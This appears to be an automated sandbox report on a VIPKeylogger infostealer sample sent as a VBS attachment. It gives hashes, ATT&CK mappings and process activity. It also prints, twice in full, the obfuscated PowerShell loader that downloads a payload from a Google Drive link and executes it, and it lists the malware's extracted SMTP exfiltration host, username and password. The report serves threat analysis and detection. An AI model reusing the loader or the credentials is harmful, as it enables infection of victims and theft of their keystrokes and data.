vipkeylogger | 120d4f7fffff6a1545c5a6fd2620fb38ea16be8baf365fb25b852859bc193919

General

Target

Data Sheet_Technical Requisition.vbs
Size

97KB
MD5

fb96faddeb253f2dc7f5ebc646b9577d
SHA1

f99b1242624a2f6fd10675ebcf0d434002132f07
SHA256

a1793711d90913e75edd176658b83e254324afc51e54f787aae45062363fb22d
SHA512

3c75f19bbdf9b63225928294dbbd76fab2513cc8c225716f9779b49919c204cca5c6fe56fe4a23ca31b96baec337c57099658f762f3d9e68b101236b06b77e53
SSDEEP

1536:PIqKuiFeYv5YBGz/tDFcjCf9OiLFRnTTFR1//fyszzooL5DxATTfq/C5DO:PIqKnFlYMz/NFqCf9Dnhrzv6fV5DO

Score

10^/10

vipkeylogger discovery execution keylogger stealer

Malware Config

Extracted

Family

vipkeylogger

Credentials

Protocol: smtp
Host:
mail.gtpv.online
Port:
587
Username:
[email protected]
Password:
7213575aceACE@@
Email To:
[email protected]

Signatures

VIPKeylogger
VIPKeylogger is a keylogger and infostealer written in C# and it resembles SnakeKeylogger that was found in 2020.
stealer keylogger vipkeylogger
Vipkeylogger family
vipkeylogger

Blocklisted process makes network request 10 IoCs

flow	pid	Process
5	2736	powershell.exe
7	2736	powershell.exe
9	880	msiexec.exe
11	880	msiexec.exe
13	880	msiexec.exe
15	880	msiexec.exe
16	880	msiexec.exe
18	880	msiexec.exe
20	880	msiexec.exe
22	880	msiexec.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2736	powershell.exe
2984	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
9	drive.google.com
4	drive.google.com
5	drive.google.com

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
17	checkip.dyndns.org
19	reallyfreegeoip.org
20	reallyfreegeoip.org

Network Service Discovery 1 TTPs 2 IoCs

Attempt to gather information on host's network.

discovery

Network Service Discovery

T1046

pid	Process
2736	powershell.exe
2984	powershell.exe

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
880	msiexec.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
2984	powershell.exe
880	msiexec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
2736	powershell.exe
2984	powershell.exe
2984	powershell.exe
880	msiexec.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
2984	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2736	powershell.exe
Token: SeDebugPrivilege	2984	powershell.exe
Token: SeDebugPrivilege	880	msiexec.exe

Suspicious use of WriteProcessMemory 11 IoCs

description	pid	Process	procid_target
PID 2228 wrote to memory of 2736	2228	WScript.exe	30
PID 2228 wrote to memory of 2736	2228	WScript.exe	30
PID 2228 wrote to memory of 2736	2228	WScript.exe	30
PID 2984 wrote to memory of 880	2984	powershell.exe	35
PID 2984 wrote to memory of 880	2984	powershell.exe	35
PID 2984 wrote to memory of 880	2984	powershell.exe	35
PID 2984 wrote to memory of 880	2984	powershell.exe	35
PID 2984 wrote to memory of 880	2984	powershell.exe	35
PID 2984 wrote to memory of 880	2984	powershell.exe	35
PID 2984 wrote to memory of 880	2984	powershell.exe	35
PID 2984 wrote to memory of 880	2984	powershell.exe	35

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Data Sheet_Technical Requisition.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2228
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Salvadoransk;function Fornjelsesrejse($Attributnavnene){ .($Barbarisme) ($Attributnavnene)} function Mahognimbels($Euphroes){$Discommendableness=5;do{$Rrligere+=$Euphroes[$Discommendableness];Format-List;$Discommendableness+=6} until(!$Euphroes[$Discommendableness])$Rrligere}$Anderledes=Mahognimbels ',kydeN Ly ne.lterTMu,ta.,litow';$Anderledes+=Mahognimbels ' sheaESk laBPoldeC InveLChordIGre seChalinEnergt';$Preeditor=Mahognimbels 'Un erMUng.eoUds iz Bisei pecilRettilUnre a,isfo/';$Hyperflexibly=Mahognimbels 'DreamTBetegl.eilistrafi1 ooky2';$gregal=' Brnd[ApospNRikiseTro bTTrapl. ecoaSStan EGarneRMarriVA,haeiTrykvcMennoe BrnepFeu,aoCortiIUd yrnNathitafsm mBaby,a F ldn prisAAbrikG FaksEBundorDvrg ]Consu:Trst :L ftssOpspre askecAngeyUPortrRFattiiSkoputopenaYK rafPHornirStemmoopst t Fo.koCaracCarbejORabicLSlags=Chast$ UnpuhGuaryyNo raPR stpESpredrMenacfE.maaLOmdefeI oncXJustii Af uBOndsilS,mliY';$Preeditor+=Mahognimbels 'Sangu5 Ho.j.Lar,d0Udsl. Anag( OverW EmiliHalicnTzol dCh,omoTrerswSma ssUnera Lor eNfi geTLugsa Tsnin1Veron0Landi.Empas0Arrog;Tor.k UnsalWsolutiT stpnFejlb6 bo,s4Vilda; nteb SimonxHetti6Pierc4Weeps; ,onu a.nfrEru,ivSubpr:Forbe1 Ved 3 Mask4,zoce.Rveha0Knock)Arkol SteaGAadseeVirgic Ti sk ashao Pro /Penne2Ibere0 ndsl1Amp.i0Nonsy0Halte1 ert0Trans1f jlh Ret,kFTrombiTestar npae GasofManuaoaro axPalme/Ramb 1Uopre3offic4Styrt. ssoc0';$Seraphina=Mahognimbels 'FictiUUnwelsEndegENyordR Henv-Subcoa PalagPapere D,bdNuncorT';$Brevteksterne=Mahognimbels 'Toholh.hilot S fftPutrepGe essPrese: Cucu/Servi/ JethdMart rRun mi,arkevBjergeSang . AnstgTorpeoAttito D sig Ple l,ndone Inge.VinylcNew woWoozimFisk./StanduGengicIndsp? OdiueSvampxF,stepAtomao Re drMandstSnfte=ProbldHeatro NivewUnerenMundslAnta oObliqaTaut dMatas&Statii U scdUnis = Prfe1suppe6Ex te_ ammeWHou,e1DigtcP ReinISkue,XBemesK Inte7TekopsVocalR GattfResdoz UntipBenh 7 heraM onseOUnsedJ Ti eKPassuRRushe9 T lrnFiske7Nyind3.ranskSumpt2OphjeZ,elgef MoldmPlatiTKapilb.sattW';$Janushoveds=Mahognimbels 'Speci>';$Barbarisme=Mahognimbels 'Ston iWo.aneR.trox';$Vidnedes='Repetitionstegnet';$Proagitation='\Camoca.Hyd';Fornjelsesrejse (Mahognimbels 'W ina$ JoruGGaffeL Ba,nOBraknbUnlecaGlaucLRampe:Fr ngL MeteiMa umaUhenssDr.seOdroutNMecae= aedo$DatereRekonnUnifaVRecup: DougASupp pDemogPHamard Unpea Be.oTBa staComd +Gluta$RefecPPhotorSkibaOspillAreagagAcer iLydtrTGogglaR plet,redjiBrfruO druN');Fornjelsesrejse (Mahognimbels 'Pare $ ,kyng.rogrLProlioMosstbkontoaKry tlLogi,:KearnSSprogERejecnMarisEOverdSBalsak PraeERhab.D rque Re.nr.ngdoNReattESyr,csNeopl=Join $Basisb BackRSlangekundeVPreasT ArbeEKrystkN kskS RadiT askaESola RHusleN DeltECirkl.RapidSgant PNeglelSprinILaichtSlatt( Kild$DommejForbeA BerunGenfdURe frSSporoh MyeloFloppvKogenEKerriD Dekls Aler)');Fornjelsesrejse (Mahognimbels $gregal);$Brevteksterne=$Seneskedernes[0];$Understregningernes=(Mahognimbels 'Bagva$BioclGA lgglU,valoBrnelbAeoloA AssuLModst:recurURema,N S neeR autdposttUThrinCUnderAOdey TDelicESpe.vdTrophl AfhoYAdmir=.inimnDyrkeEI valW Deco-upaakOGonopbBillbJAmbigeApokrC fabuTRsted Carais As uY A,mrSLnposTTisseEBi leMPetio.Klumr$SkarpAS.oonnVenstdFljlse DiskRRisscLMo ore HalfDTotaledecapS');Fornjelsesrejse ($Understregningernes);Fornjelsesrejse (Mahognimbels ' Vi.i$ PaikUProponAfmare Nov d de,auShuttcRickeaByggetU graeNielldLsepul ndeySe,ke.BehanH M oneFairbaKhi mdCas ae PalarP lypsU sol[Re.ee$ObtecSnedbreSneenrMisd aVa mepPseudh fregiAccumnJvntva Over]Besoo=Choke$TilkoP OrdkrSilvee Nonte Howfd L ddi,oreotA.tivoDomesr');$Asperly=Mahognimbels ' ontr$PneumUBrolgnStadee Avocd AntiuNdud,cEnfeoaBedpattrocheDribldK mmil AfsyySk al.InlooDDrueao B ndw BuconI.emalFrereoLandsaLednidLdig.FManagiBehusl HebeeDefri( .uba$BaculBLan.wrBubaleOmhegvTr.nstRyatpeBlndekGevans Bi.et Ledee UndirVeretnEfte e Mail,Afs u$O erlN reamoHjernn A,becJungsoPer hnErhvetLand uenneamTri na SnylcDowsei.aceho Tobau EngasLitholRajahyova p)';$Noncontumaciously=$Liason;Fornjelsesrejse (Mahognimbels 'Lejev$IntongBecraLNecrooindleb P ntaUrethLBlokt: sk,apImperA B,rkRanthrADepraMSttteELoggeTFunktEFoumaR sponFKugler Unf.EB msumHabitSUnif tmann i Pre LAftenlS,enaiBlindn DecoGGyrfaE FremRBu,tiNFangseDanewsHyloz=reser(Bora.TFluorETemasSPa agTK lve-LignepSlan,ASpecit atriHKolo Viges$FlesanRaadsOdaabsN AniscVarseoUneliNBaromTshadeuKabelmButteA BarqCPhytoi etro lufbUUnbelsTekstl TrelyUnd l)');while (!$Parameterfremstillingernes) {Fornjelsesrejse (Mahognimbels 'Elekt$scr pgWailalFi uro Undeb AfspaW.llolmisb :KlageSTe raps amraKlarir Int.eTh oppCarpeeMarmonNon,agPin,ae Gral=Ancie$Kl,ttF.nligoFjermrWrytasr,ntevTuneaaWaterrSpindsFredscAfsinhSlv me Acerf') ;Fornjelsesrejse $Asperly;Fornjelsesrejse (Mahognimbels 'Unde,[Flasktl opahjumelRKroneeAfterA R,vaDF rbii Ne,eNDataug Past.PolliT .mbyHC rmir Sta E UndeA NormDFrdse]Irena:Lerna:DikdiS ideaLObvafeDiskeE .alapRe.ir(Steel4 pibl0svige0 Genk0Sel,h)');Fornjelsesrejse (Mahognimbels ' Isfl$ EbulgF,emdl.dvido.nspebSugn,aPrepolXerop:LechwpActuaaS desrJuiceATenemmrizifE diagtOleoreMeteorCadg.FKa rerDemesEGn.bbm FrossSkoddt oolei Loc LSoilaLArve.IugideN aereGBan.aEm grirHayesnOverfE KnasSSubaf=Unc.n(ExhumTRelegeAnte sMacultDisca-skydePLledeASpo ltSnrinH,fhjl Rolle$Fr voNSvampOTrafinMi crCSen ioNonatn chizTOutliuI.pleMGard aPeppiCTyv.nIafteronitroU irnSKirkeLPostuYBille)') ;Fornjelsesrejse (Mahognimbels 'Fo br$C talg Styrl RosoOForb BLupoua HelblU hus:UnstoT GlasUSvejsSHumanSBlokeE OverNTrans=Tobak$FasheGDefecLDulciOModreb Dyn.A orullZiphi:PeriofB cilAWinteiZonelNBl gnehylder F rd+Under+M,xin% T.nt$StrudS Un uE TromNV,guseVedhnSP ppiKLyst ECleroD VasoE MalaRD ninnLine.EOverosKontr. llagCMal,eo SodauTig enUn,ent') ;$Brevteksterne=$Seneskedernes[$tussen]}$Arveberettigede=328806;$fallacia=32163;Fornjelsesrejse (Mahognimbels 'Plane$trophglrerfl SpodoAcr abStjdeaNonkol Opma: ttaipDyphoSAflssYDeweyKS leroBauboA autoN AntlaEfterLUnburYMic oS Plase dsbor yrde Skvat= Over SkydeG Rad.Efor dtLegal- MeroCHimmeoAlpevNDokumtTapemEIndbrN.uricT c,me afsej$WaverN ForuOTjlewNPh toC OutpO,eskiN Hij.T GlucuIndekmThesmAUnsincOmarbIIndtroDrif UNephos UdbylCond,y');Fornjelsesrejse (Mahognimbels 'stav,$LandmgA.niglAtopioProjebLat,ha ThaklBrude: DillS P oot triso VejlrSterutSkroeu finadDagspeAlvordE loge .yphs erik Acti= Cr.m De es[ SaltSLondoy CounsCembatNoncoeIllegm orda.KalifCFirkloNitt.na caivKollee ysenrFr cttFranj]Agonk:Refla:TrykkFFremmra cepoAl ohmTalelB.upliaGud,ns ekspeUnsta6Fjols4PerisSSubtut VaerrdiskeiDetr nDr.pegUnive(Henzi$Ste,cpDevocs Gokayca,askM,crooBar eaGravenbehigaTerrol EkskyHi ersS enbeSpaltrEmitt)');Fornjelsesrejse (Mahognimbels 'Lufti$Near gAge.tLEmajao BrusB ingaSa.meLLuder:U worK PastBRigsaMStratnSamtaD Tilf Mate =Trium Alumi[Guri.S ransY O,erS TohaT Sta.eD verMSlbe.. nrupt,egmaeColmaX F atTSarse.Ufor.e O ern BomrC,uccuOOpslad BndsiAv.shN klovgEmbos]Jimmi:Ggebg:Al.gnA Fl.rsForsoCSuperIMantiI Sele.DdsougLi ieEA ridthystas GtevtRenheRPetitiApocen S.crG Whir( N,dn$ter osVelkotA.fabO esilRDemonTEp spu BugaDke,seeTeltsD ,vgeEKwartSAffyr)');Fornjelsesrejse (Mahognimbels 'Hjbro$KnallgscoutLPagajo ordB,phexa LydtL Cirk:RavrrtRa dspAss,eP Ngs.E ChikDFor.le Kalk=haa d$ Coo,k.trkbBHa maMBlin.nGaaseDHe,ge.Resurs Ski uPropfBApparsPlasttLakrirOrthoiPhoenNOvergGSparr(Anbri$HeliaANougaR PostVRekapeD ffuB brndeMydrirAfspaEErs.wTUdenrTXiraxIUdvejgpregueJerngdLobsteGrund, Atom$PitchfDownlAUdlanLLinieLT rana TakscSrveriTi,foA.tats)');Fornjelsesrejse $Tppede;"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Network Service Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2736

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "echo $Salvadoransk;function Fornjelsesrejse($Attributnavnene){ .($Barbarisme) ($Attributnavnene)} function Mahognimbels($Euphroes){$Discommendableness=5;do{$Rrligere+=$Euphroes[$Discommendableness];Format-List;$Discommendableness+=6} until(!$Euphroes[$Discommendableness])$Rrligere}$Anderledes=Mahognimbels ',kydeN Ly ne.lterTMu,ta.,litow';$Anderledes+=Mahognimbels ' sheaESk laBPoldeC InveLChordIGre seChalinEnergt';$Preeditor=Mahognimbels 'Un erMUng.eoUds iz Bisei pecilRettilUnre a,isfo/';$Hyperflexibly=Mahognimbels 'DreamTBetegl.eilistrafi1 ooky2';$gregal=' Brnd[ApospNRikiseTro bTTrapl. ecoaSStan EGarneRMarriVA,haeiTrykvcMennoe BrnepFeu,aoCortiIUd yrnNathitafsm mBaby,a F ldn prisAAbrikG FaksEBundorDvrg ]Consu:Trst :L ftssOpspre askecAngeyUPortrRFattiiSkoputopenaYK rafPHornirStemmoopst t Fo.koCaracCarbejORabicLSlags=Chast$ UnpuhGuaryyNo raPR stpESpredrMenacfE.maaLOmdefeI oncXJustii Af uBOndsilS,mliY';$Preeditor+=Mahognimbels 'Sangu5 Ho.j.Lar,d0Udsl. Anag( OverW EmiliHalicnTzol dCh,omoTrerswSma ssUnera Lor eNfi geTLugsa Tsnin1Veron0Landi.Empas0Arrog;Tor.k UnsalWsolutiT stpnFejlb6 bo,s4Vilda; nteb SimonxHetti6Pierc4Weeps; ,onu a.nfrEru,ivSubpr:Forbe1 Ved 3 Mask4,zoce.Rveha0Knock)Arkol SteaGAadseeVirgic Ti sk ashao Pro /Penne2Ibere0 ndsl1Amp.i0Nonsy0Halte1 ert0Trans1f jlh Ret,kFTrombiTestar npae GasofManuaoaro axPalme/Ramb 1Uopre3offic4Styrt. ssoc0';$Seraphina=Mahognimbels 'FictiUUnwelsEndegENyordR Henv-Subcoa PalagPapere D,bdNuncorT';$Brevteksterne=Mahognimbels 'Toholh.hilot S fftPutrepGe essPrese: Cucu/Servi/ JethdMart rRun mi,arkevBjergeSang . AnstgTorpeoAttito D sig Ple l,ndone Inge.VinylcNew woWoozimFisk./StanduGengicIndsp? OdiueSvampxF,stepAtomao Re drMandstSnfte=ProbldHeatro NivewUnerenMundslAnta oObliqaTaut dMatas&Statii U scdUnis = Prfe1suppe6Ex te_ ammeWHou,e1DigtcP ReinISkue,XBemesK Inte7TekopsVocalR GattfResdoz UntipBenh 7 heraM onseOUnsedJ Ti eKPassuRRushe9 T lrnFiske7Nyind3.ranskSumpt2OphjeZ,elgef MoldmPlatiTKapilb.sattW';$Janushoveds=Mahognimbels 'Speci>';$Barbarisme=Mahognimbels 'Ston iWo.aneR.trox';$Vidnedes='Repetitionstegnet';$Proagitation='\Camoca.Hyd';Fornjelsesrejse (Mahognimbels 'W ina$ JoruGGaffeL Ba,nOBraknbUnlecaGlaucLRampe:Fr ngL MeteiMa umaUhenssDr.seOdroutNMecae= aedo$DatereRekonnUnifaVRecup: DougASupp pDemogPHamard Unpea Be.oTBa staComd +Gluta$RefecPPhotorSkibaOspillAreagagAcer iLydtrTGogglaR plet,redjiBrfruO druN');Fornjelsesrejse (Mahognimbels 'Pare $ ,kyng.rogrLProlioMosstbkontoaKry tlLogi,:KearnSSprogERejecnMarisEOverdSBalsak PraeERhab.D rque Re.nr.ngdoNReattESyr,csNeopl=Join $Basisb BackRSlangekundeVPreasT ArbeEKrystkN kskS RadiT askaESola RHusleN DeltECirkl.RapidSgant PNeglelSprinILaichtSlatt( Kild$DommejForbeA BerunGenfdURe frSSporoh MyeloFloppvKogenEKerriD Dekls Aler)');Fornjelsesrejse (Mahognimbels $gregal);$Brevteksterne=$Seneskedernes[0];$Understregningernes=(Mahognimbels 'Bagva$BioclGA lgglU,valoBrnelbAeoloA AssuLModst:recurURema,N S neeR autdposttUThrinCUnderAOdey TDelicESpe.vdTrophl AfhoYAdmir=.inimnDyrkeEI valW Deco-upaakOGonopbBillbJAmbigeApokrC fabuTRsted Carais As uY A,mrSLnposTTisseEBi leMPetio.Klumr$SkarpAS.oonnVenstdFljlse DiskRRisscLMo ore HalfDTotaledecapS');Fornjelsesrejse ($Understregningernes);Fornjelsesrejse (Mahognimbels ' Vi.i$ PaikUProponAfmare Nov d de,auShuttcRickeaByggetU graeNielldLsepul ndeySe,ke.BehanH M oneFairbaKhi mdCas ae PalarP lypsU sol[Re.ee$ObtecSnedbreSneenrMisd aVa mepPseudh fregiAccumnJvntva Over]Besoo=Choke$TilkoP OrdkrSilvee Nonte Howfd L ddi,oreotA.tivoDomesr');$Asperly=Mahognimbels ' ontr$PneumUBrolgnStadee Avocd AntiuNdud,cEnfeoaBedpattrocheDribldK mmil AfsyySk al.InlooDDrueao B ndw BuconI.emalFrereoLandsaLednidLdig.FManagiBehusl HebeeDefri( .uba$BaculBLan.wrBubaleOmhegvTr.nstRyatpeBlndekGevans Bi.et Ledee UndirVeretnEfte e Mail,Afs u$O erlN reamoHjernn A,becJungsoPer hnErhvetLand uenneamTri na SnylcDowsei.aceho Tobau EngasLitholRajahyova p)';$Noncontumaciously=$Liason;Fornjelsesrejse (Mahognimbels 'Lejev$IntongBecraLNecrooindleb P ntaUrethLBlokt: sk,apImperA B,rkRanthrADepraMSttteELoggeTFunktEFoumaR sponFKugler Unf.EB msumHabitSUnif tmann i Pre LAftenlS,enaiBlindn DecoGGyrfaE FremRBu,tiNFangseDanewsHyloz=reser(Bora.TFluorETemasSPa agTK lve-LignepSlan,ASpecit atriHKolo Viges$FlesanRaadsOdaabsN AniscVarseoUneliNBaromTshadeuKabelmButteA BarqCPhytoi etro lufbUUnbelsTekstl TrelyUnd l)');while (!$Parameterfremstillingernes) {Fornjelsesrejse (Mahognimbels 'Elekt$scr pgWailalFi uro Undeb AfspaW.llolmisb :KlageSTe raps amraKlarir Int.eTh oppCarpeeMarmonNon,agPin,ae Gral=Ancie$Kl,ttF.nligoFjermrWrytasr,ntevTuneaaWaterrSpindsFredscAfsinhSlv me Acerf') ;Fornjelsesrejse $Asperly;Fornjelsesrejse (Mahognimbels 'Unde,[Flasktl opahjumelRKroneeAfterA R,vaDF rbii Ne,eNDataug Past.PolliT .mbyHC rmir Sta E UndeA NormDFrdse]Irena:Lerna:DikdiS ideaLObvafeDiskeE .alapRe.ir(Steel4 pibl0svige0 Genk0Sel,h)');Fornjelsesrejse (Mahognimbels ' Isfl$ EbulgF,emdl.dvido.nspebSugn,aPrepolXerop:LechwpActuaaS desrJuiceATenemmrizifE diagtOleoreMeteorCadg.FKa rerDemesEGn.bbm FrossSkoddt oolei Loc LSoilaLArve.IugideN aereGBan.aEm grirHayesnOverfE KnasSSubaf=Unc.n(ExhumTRelegeAnte sMacultDisca-skydePLledeASpo ltSnrinH,fhjl Rolle$Fr voNSvampOTrafinMi crCSen ioNonatn chizTOutliuI.pleMGard aPeppiCTyv.nIafteronitroU irnSKirkeLPostuYBille)') ;Fornjelsesrejse (Mahognimbels 'Fo br$C talg Styrl RosoOForb BLupoua HelblU hus:UnstoT GlasUSvejsSHumanSBlokeE OverNTrans=Tobak$FasheGDefecLDulciOModreb Dyn.A orullZiphi:PeriofB cilAWinteiZonelNBl gnehylder F rd+Under+M,xin% T.nt$StrudS Un uE TromNV,guseVedhnSP ppiKLyst ECleroD VasoE MalaRD ninnLine.EOverosKontr. llagCMal,eo SodauTig enUn,ent') ;$Brevteksterne=$Seneskedernes[$tussen]}$Arveberettigede=328806;$fallacia=32163;Fornjelsesrejse (Mahognimbels 'Plane$trophglrerfl SpodoAcr abStjdeaNonkol Opma: ttaipDyphoSAflssYDeweyKS leroBauboA autoN AntlaEfterLUnburYMic oS Plase dsbor yrde Skvat= Over SkydeG Rad.Efor dtLegal- MeroCHimmeoAlpevNDokumtTapemEIndbrN.uricT c,me afsej$WaverN ForuOTjlewNPh toC OutpO,eskiN Hij.T GlucuIndekmThesmAUnsincOmarbIIndtroDrif UNephos UdbylCond,y');Fornjelsesrejse (Mahognimbels 'stav,$LandmgA.niglAtopioProjebLat,ha ThaklBrude: DillS P oot triso VejlrSterutSkroeu finadDagspeAlvordE loge .yphs erik Acti= Cr.m De es[ SaltSLondoy CounsCembatNoncoeIllegm orda.KalifCFirkloNitt.na caivKollee ysenrFr cttFranj]Agonk:Refla:TrykkFFremmra cepoAl ohmTalelB.upliaGud,ns ekspeUnsta6Fjols4PerisSSubtut VaerrdiskeiDetr nDr.pegUnive(Henzi$Ste,cpDevocs Gokayca,askM,crooBar eaGravenbehigaTerrol EkskyHi ersS enbeSpaltrEmitt)');Fornjelsesrejse (Mahognimbels 'Lufti$Near gAge.tLEmajao BrusB ingaSa.meLLuder:U worK PastBRigsaMStratnSamtaD Tilf Mate =Trium Alumi[Guri.S ransY O,erS TohaT Sta.eD verMSlbe.. nrupt,egmaeColmaX F atTSarse.Ufor.e O ern BomrC,uccuOOpslad BndsiAv.shN klovgEmbos]Jimmi:Ggebg:Al.gnA Fl.rsForsoCSuperIMantiI Sele.DdsougLi ieEA ridthystas GtevtRenheRPetitiApocen S.crG Whir( N,dn$ter osVelkotA.fabO esilRDemonTEp spu BugaDke,seeTeltsD ,vgeEKwartSAffyr)');Fornjelsesrejse (Mahognimbels 'Hjbro$KnallgscoutLPagajo ordB,phexa LydtL Cirk:RavrrtRa dspAss,eP Ngs.E ChikDFor.le Kalk=haa d$ Coo,k.trkbBHa maMBlin.nGaaseDHe,ge.Resurs Ski uPropfBApparsPlasttLakrirOrthoiPhoenNOvergGSparr(Anbri$HeliaANougaR PostVRekapeD ffuB brndeMydrirAfspaEErs.wTUdenrTXiraxIUdvejgpregueJerngdLobsteGrund, Atom$PitchfDownlAUdlanLLinieLT rana TakscSrveriTi,foA.tats)');Fornjelsesrejse $Tppede;"
1⤵
- Command and Scripting Interpreter: PowerShell
- Network Service Discovery
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2984
- C:\Windows\SysWOW64\msiexec.exe
  "C:\Windows\SysWOW64\msiexec.exe"
  2⤵
  - Blocklisted process makes network request
  - Suspicious use of NtCreateThreadExHideFromDebugger
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:880

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Network Service Discovery

1

T1046

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Camoca.Hyd

Filesize
470KB

MD5
e010f4d7745147f8b2a27ed8eeb565a5

SHA1
3f575d09242e38ce00bd8dbbaf6a5addda53a27c

SHA256
5e50635cfcb713392275c40a3c98d8a4bd1a700e816e7b0ee08831613b22c5e6

SHA512
15ab91459c055ea60b365873c06dc9f4164733f5461f43c5f1900a0dacdd9d5d067bdbcd0b4208c593791784afc622af11ddb288f8941076265a330df437ffc6

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\JRHTD3AFG2M4LXBWSQN3.temp

Filesize
7KB

MD5
c0a7e4925c51d9fa9b8194e82d61a6e3

SHA1
176bb2d992b646bd02fa1e0af5f5ef55d209c697

SHA256
efd4e69b74fe4493e8895a8c4e3536573e1b78c854b71a5d0ad79397985567f1

SHA512
efed4ecfca2404fb39aa27aa49114c5bb199125ffcd30a3c56822853e0de0b4c65e26a52971fab3f9bca8a833b3654d23bb79219e1954e3bcb167486748e2e56

Download Submit
memory/880-42-0x0000000000B90000-0x0000000001BF2000-memory.dmp

Filesize
16.4MB

Download
memory/880-43-0x0000000000B90000-0x0000000000BD8000-memory.dmp

Filesize
288KB

Download
memory/2736-8-0x000007FEF4E80000-0x000007FEF581D000-memory.dmp

Filesize
9.6MB

Download
memory/2736-9-0x000007FEF4E80000-0x000007FEF581D000-memory.dmp

Filesize
9.6MB

Download
memory/2736-10-0x000007FEF4E80000-0x000007FEF581D000-memory.dmp

Filesize
9.6MB

Download
memory/2736-11-0x000007FEF4E80000-0x000007FEF581D000-memory.dmp

Filesize
9.6MB

Download
memory/2736-13-0x000007FEF4E80000-0x000007FEF581D000-memory.dmp

Filesize
9.6MB

Download
memory/2736-14-0x000007FEF513E000-0x000007FEF513F000-memory.dmp

Filesize
4KB

Download
memory/2736-16-0x000007FEF4E80000-0x000007FEF581D000-memory.dmp

Filesize
9.6MB

Download
memory/2736-4-0x000007FEF513E000-0x000007FEF513F000-memory.dmp

Filesize
4KB

Download
memory/2736-7-0x000007FEF4E80000-0x000007FEF581D000-memory.dmp

Filesize
9.6MB

Download
memory/2736-6-0x00000000029E0000-0x00000000029E8000-memory.dmp

Filesize
32KB

Download
memory/2736-5-0x000000001B710000-0x000000001B9F2000-memory.dmp

Filesize
2.9MB

Download
memory/2984-20-0x0000000006660000-0x0000000007D7C000-memory.dmp

Filesize
23.1MB

Download

Analysis

Sharing